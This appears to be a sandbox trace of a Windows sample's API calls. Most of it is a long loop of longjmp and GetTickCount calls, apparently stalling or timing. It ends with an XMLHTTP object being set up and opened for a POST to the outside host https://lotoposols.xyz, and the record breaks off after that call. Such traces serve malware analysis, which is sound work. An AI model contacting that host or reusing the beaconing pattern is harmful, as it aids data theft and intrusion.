	[0244.298] longjmp () 
	[0244.298] GetTickCount () returned 0x11712a7
	[0244.298] longjmp () 
	[0244.298] longjmp () 
	[0244.298] longjmp () 
	[0244.298] longjmp () 
	[0244.299] longjmp () 
	[0244.299] longjmp () 
	[0244.299] longjmp () 
	[0244.299] longjmp () 
	[0244.300] longjmp () 
	[0244.300] longjmp () 
	[0244.300] longjmp () 
	[0244.300] longjmp () 
	[0244.301] longjmp () 
	[0244.301] longjmp () 
	[0244.301] longjmp () 
	[0244.301] longjmp () 
	[0244.301] longjmp () 
	[0244.302] longjmp () 
	[0244.302] longjmp () 
	[0244.302] longjmp () 
	[0244.302] longjmp () 
	[0244.302] longjmp () 
	[0244.303] longjmp () 
	[0244.303] longjmp () 
	[0244.303] longjmp () 
	[0244.303] longjmp () 
	[0244.303] longjmp () 
	[0244.303] longjmp () 
	[0244.304] longjmp () 
	[0244.304] longjmp () 
	[0244.304] longjmp () 
	[0244.304] longjmp () 
	[0244.304] GetTickCount () returned 0x11712a7
	[0244.304] longjmp () 
	[0244.305] longjmp () 
	[0244.305] longjmp () 
	[0244.305] longjmp () 
	[0244.305] longjmp () 
	[0244.305] longjmp () 
	[0244.305] longjmp () 
	[0244.306] longjmp () 
	[0244.306] longjmp () 
	[0244.306] longjmp () 
	[0244.306] longjmp () 
	[0244.306] longjmp () 
	[0244.307] longjmp () 
	[0244.307] longjmp () 
	[0244.307] longjmp () 
	[0244.307] longjmp () 
	[0244.307] longjmp () 
	[0244.307] longjmp () 
	[0244.308] longjmp () 
	[0244.308] longjmp () 
	[0244.308] longjmp () 
	[0244.308] longjmp () 
	[0244.308] longjmp () 
	[0244.309] longjmp () 
	[0244.309] longjmp () 
	[0244.309] longjmp () 
	[0244.309] longjmp () 
	[0244.309] longjmp () 
	[0244.310] longjmp () 
	[0244.310] longjmp () 
	[0244.310] longjmp () 
	[0244.310] longjmp () 
	[0244.310] GetTickCount () returned 0x11712a7
	[0244.310] longjmp () 
	[0244.310] longjmp () 
	[0244.311] longjmp () 
	[0244.311] longjmp () 
	[0244.311] longjmp () 
	[0244.311] longjmp () 
	[0244.311] longjmp () 
	[0244.311] longjmp () 
	[0244.312] longjmp () 
	[0244.312] longjmp () 
	[0244.312] longjmp () 
	[0244.312] longjmp () 
	[0244.313] longjmp () 
	[0244.313] longjmp () 
	[0244.313] longjmp () 
	[0244.313] longjmp () 
	[0244.313] longjmp () 
	[0244.313] longjmp () 
	[0244.314] longjmp () 
	[0244.314] longjmp () 
	[0244.314] longjmp () 
	[0244.314] longjmp () 
	[0244.314] longjmp () 
	[0244.315] longjmp () 
	[0244.315] longjmp () 
	[0244.315] longjmp () 
	[0244.315] longjmp () 
	[0244.315] longjmp () 
	[0244.316] longjmp () 
	[0244.316] longjmp () 
	[0244.316] longjmp () 
	[0244.316] longjmp () 
	[0244.316] GetTickCount () returned 0x11712b7
	[0244.316] longjmp () 
	[0244.317] longjmp () 
	[0244.317] longjmp () 
	[0244.317] longjmp () 
	[0244.317] longjmp () 
	[0244.317] longjmp () 
	[0244.317] longjmp () 
	[0244.318] longjmp () 
	[0244.318] longjmp () 
	[0244.318] longjmp () 
	[0244.318] longjmp () 
	[0244.318] longjmp () 
	[0244.319] longjmp () 
	[0244.319] longjmp () 
	[0244.319] longjmp () 
	[0244.319] longjmp () 
	[0244.319] longjmp () 
	[0244.319] longjmp () 
	[0244.320] longjmp () 
	[0244.320] longjmp () 
	[0244.320] longjmp () 
	[0244.320] longjmp () 
	[0244.320] longjmp () 
	[0244.320] longjmp () 
	[0244.321] longjmp () 
	[0244.321] longjmp () 
	[0244.321] longjmp () 
	[0244.321] longjmp () 
	[0244.321] longjmp () 
	[0244.321] longjmp () 
	[0244.322] longjmp () 
	[0244.322] longjmp () 
	[0244.322] GetTickCount () returned 0x11712b7
	[0244.322] longjmp () 
	[0244.322] longjmp () 
	[0244.322] longjmp () 
	[0244.323] longjmp () 
	[0244.323] longjmp () 
	[0244.323] longjmp () 
	[0244.323] longjmp () 
	[0244.324] longjmp () 
	[0244.324] longjmp () 
	[0244.324] longjmp () 
	[0244.324] longjmp () 
	[0244.325] longjmp () 
	[0244.325] longjmp () 
	[0244.325] longjmp () 
	[0244.325] longjmp () 
	[0244.326] longjmp () 
	[0244.326] longjmp () 
	[0244.326] longjmp () 
	[0244.326] longjmp () 
	[0244.327] longjmp () 
	[0244.327] longjmp () 
	[0244.327] longjmp () 
	[0244.327] longjmp () 
	[0244.328] longjmp () 
	[0244.328] longjmp () 
	[0244.328] longjmp () 
	[0244.328] longjmp () 
	[0244.328] longjmp () 
	[0244.329] longjmp () 
	[0244.329] longjmp () 
	[0244.329] longjmp () 
	[0244.329] longjmp () 
	[0244.330] GetTickCount () returned 0x11712c6
	[0244.330] longjmp () 
	[0244.330] longjmp () 
	[0244.330] longjmp () 
	[0244.330] longjmp () 
	[0244.331] longjmp () 
	[0244.331] longjmp () 
	[0244.331] longjmp () 
	[0244.331] longjmp () 
	[0244.332] longjmp () 
	[0244.332] longjmp () 
	[0244.332] longjmp () 
	[0244.332] longjmp () 
	[0244.332] longjmp () 
	[0244.333] longjmp () 
	[0244.333] longjmp () 
	[0244.333] longjmp () 
	[0244.333] longjmp () 
	[0244.334] longjmp () 
	[0244.334] longjmp () 
	[0244.334] longjmp () 
	[0244.334] longjmp () 
	[0244.335] longjmp () 
	[0244.335] longjmp () 
	[0244.335] longjmp () 
	[0244.335] longjmp () 
	[0244.335] longjmp () 
	[0244.336] longjmp () 
	[0244.336] longjmp () 
	[0244.336] longjmp () 
	[0244.336] longjmp () 
	[0244.337] longjmp () 
	[0244.337] longjmp () 
	[0244.337] GetTickCount () returned 0x11712c6
	[0244.337] longjmp () 
	[0244.337] longjmp () 
	[0244.338] longjmp () 
	[0244.338] longjmp () 
	[0244.338] longjmp () 
	[0244.338] longjmp () 
	[0244.338] longjmp () 
	[0244.339] longjmp () 
	[0244.339] longjmp () 
	[0244.339] longjmp () 
	[0244.339] longjmp () 
	[0244.340] longjmp () 
	[0244.340] longjmp () 
	[0244.340] longjmp () 
	[0244.340] longjmp () 
	[0244.340] longjmp () 
	[0244.341] longjmp () 
	[0244.341] longjmp () 
	[0244.341] longjmp () 
	[0244.341] longjmp () 
	[0244.342] longjmp () 
	[0244.342] longjmp () 
	[0244.342] longjmp () 
	[0244.342] longjmp () 
	[0244.343] longjmp () 
	[0244.343] longjmp () 
	[0244.343] longjmp () 
	[0244.343] longjmp () 
	[0244.344] longjmp () 
	[0244.344] longjmp () 
	[0244.344] longjmp () 
	[0244.344] longjmp () 
	[0244.345] GetTickCount () returned 0x11712d6
	[0244.345] longjmp () 
	[0244.345] longjmp () 
	[0244.345] longjmp () 
	[0244.345] longjmp () 
	[0244.346] longjmp () 
	[0244.346] longjmp () 
	[0244.346] longjmp () 
	[0244.346] longjmp () 
	[0244.347] longjmp () 
	[0244.347] longjmp () 
	[0244.347] longjmp () 
	[0244.348] longjmp () 
	[0244.348] longjmp () 
	[0244.348] longjmp () 
	[0244.348] longjmp () 
	[0244.348] longjmp () 
	[0244.349] longjmp () 
	[0244.349] longjmp () 
	[0244.349] longjmp () 
	[0244.349] longjmp () 
	[0244.350] longjmp () 
	[0244.350] longjmp () 
	[0244.350] longjmp () 
	[0244.350] longjmp () 
	[0244.350] longjmp () 
	[0244.351] longjmp () 
	[0244.351] longjmp () 
	[0244.351] longjmp () 
	[0244.351] longjmp () 
	[0244.351] longjmp () 
	[0244.351] longjmp () 
	[0244.352] longjmp () 
	[0244.352] GetTickCount () returned 0x11712d6
	[0244.352] longjmp () 
	[0244.352] longjmp () 
	[0244.352] longjmp () 
	[0244.352] longjmp () 
	[0244.353] longjmp () 
	[0244.353] longjmp () 
	[0244.353] longjmp () 
	[0244.353] longjmp () 
	[0244.353] longjmp () 
	[0244.353] longjmp () 
	[0244.354] longjmp () 
	[0244.354] longjmp () 
	[0244.354] longjmp () 
	[0244.354] longjmp () 
	[0244.355] longjmp () 
	[0244.355] longjmp () 
	[0244.355] longjmp () 
	[0244.355] longjmp () 
	[0244.356] longjmp () 
	[0244.356] longjmp () 
	[0244.356] longjmp () 
	[0244.356] longjmp () 
	[0244.357] longjmp () 
	[0244.357] longjmp () 
	[0244.357] longjmp () 
	[0244.357] longjmp () 
	[0244.358] longjmp () 
	[0244.358] longjmp () 
	[0244.358] longjmp () 
	[0244.358] longjmp () 
	[0244.359] longjmp () 
	[0244.359] longjmp () 
	[0244.360] GetTickCount () returned 0x11712e5
	[0244.360] longjmp () 
	[0244.360] longjmp () 
	[0244.360] longjmp () 
	[0244.360] longjmp () 
	[0244.361] longjmp () 
	[0244.361] longjmp () 
	[0244.361] longjmp () 
	[0244.361] longjmp () 
	[0244.362] longjmp () 
	[0244.362] longjmp () 
	[0244.362] longjmp () 
	[0244.362] longjmp () 
	[0244.363] longjmp () 
	[0244.363] longjmp () 
	[0244.363] longjmp () 
	[0244.363] longjmp () 
	[0244.364] longjmp () 
	[0244.364] longjmp () 
	[0244.364] longjmp () 
	[0244.364] longjmp () 
	[0244.365] longjmp () 
	[0244.365] longjmp () 
	[0244.365] longjmp () 
	[0244.365] longjmp () 
	[0244.366] longjmp () 
	[0244.366] longjmp () 
	[0244.366] longjmp () 
	[0244.366] longjmp () 
	[0244.367] longjmp () 
	[0244.367] longjmp () 
	[0244.367] longjmp () 
	[0244.367] longjmp () 
	[0244.368] GetTickCount () returned 0x11712e5
	[0244.368] longjmp () 
	[0244.368] longjmp () 
	[0244.368] longjmp () 
	[0244.368] longjmp () 
	[0244.369] longjmp () 
	[0244.369] longjmp () 
	[0244.369] longjmp () 
	[0244.369] longjmp () 
	[0244.370] longjmp () 
	[0244.370] longjmp () 
	[0244.370] longjmp () 
	[0244.370] longjmp () 
	[0244.371] longjmp () 
	[0244.371] longjmp () 
	[0244.371] longjmp () 
	[0244.371] longjmp () 
	[0244.372] longjmp () 
	[0244.372] longjmp () 
	[0244.372] longjmp () 
	[0244.372] longjmp () 
	[0244.373] longjmp () 
	[0244.373] longjmp () 
	[0244.373] longjmp () 
	[0244.373] longjmp () 
	[0244.373] longjmp () 
	[0244.374] longjmp () 
	[0244.374] longjmp () 
	[0244.374] longjmp () 
	[0244.374] longjmp () 
	[0244.417] longjmp () 
	[0244.417] longjmp () 
	[0244.417] longjmp () 
	[0244.418] GetTickCount () returned 0x1171314
	[0244.418] longjmp () 
	[0244.418] longjmp () 
	[0244.418] longjmp () 
	[0244.418] longjmp () 
	[0244.419] longjmp () 
	[0244.419] longjmp () 
	[0244.419] longjmp () 
	[0244.419] longjmp () 
	[0244.419] longjmp () 
	[0244.420] longjmp () 
	[0244.420] longjmp () 
	[0244.420] longjmp () 
	[0244.420] longjmp () 
	[0244.421] longjmp () 
	[0244.421] longjmp () 
	[0244.421] longjmp () 
	[0244.421] longjmp () 
	[0244.422] longjmp () 
	[0244.422] longjmp () 
	[0244.422] longjmp () 
	[0244.422] longjmp () 
	[0244.422] longjmp () 
	[0244.423] longjmp () 
	[0244.423] longjmp () 
	[0244.423] longjmp () 
	[0244.423] longjmp () 
	[0244.423] longjmp () 
	[0244.424] longjmp () 
	[0244.424] longjmp () 
	[0244.424] longjmp () 
	[0244.424] longjmp () 
	[0244.424] longjmp () 
	[0244.425] GetTickCount () returned 0x1171324
	[0244.425] longjmp () 
	[0244.425] longjmp () 
	[0244.425] longjmp () 
	[0244.425] longjmp () 
	[0244.426] longjmp () 
	[0244.426] longjmp () 
	[0244.426] longjmp () 
	[0244.426] longjmp () 
	[0244.428] longjmp () 
	[0244.429] longjmp () 
	[0244.429] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0244.429] SysStringLen (param_1=0x0) returned 0x0
	[0244.429] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0244.429] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0244.429] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0244.430] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0244.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0244.430] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0244.430] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0244.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0244.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0244.430] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0244.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0244.430] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0244.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0244.431] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0244.431] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0244.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0244.432] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0244.432] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0244.432] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0244.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0244.432] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0244.432] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0244.432] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0244.432] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0244.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0244.432] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0244.437] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0244.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0244.438] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0244.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0244.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0244.438] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0244.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0244.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
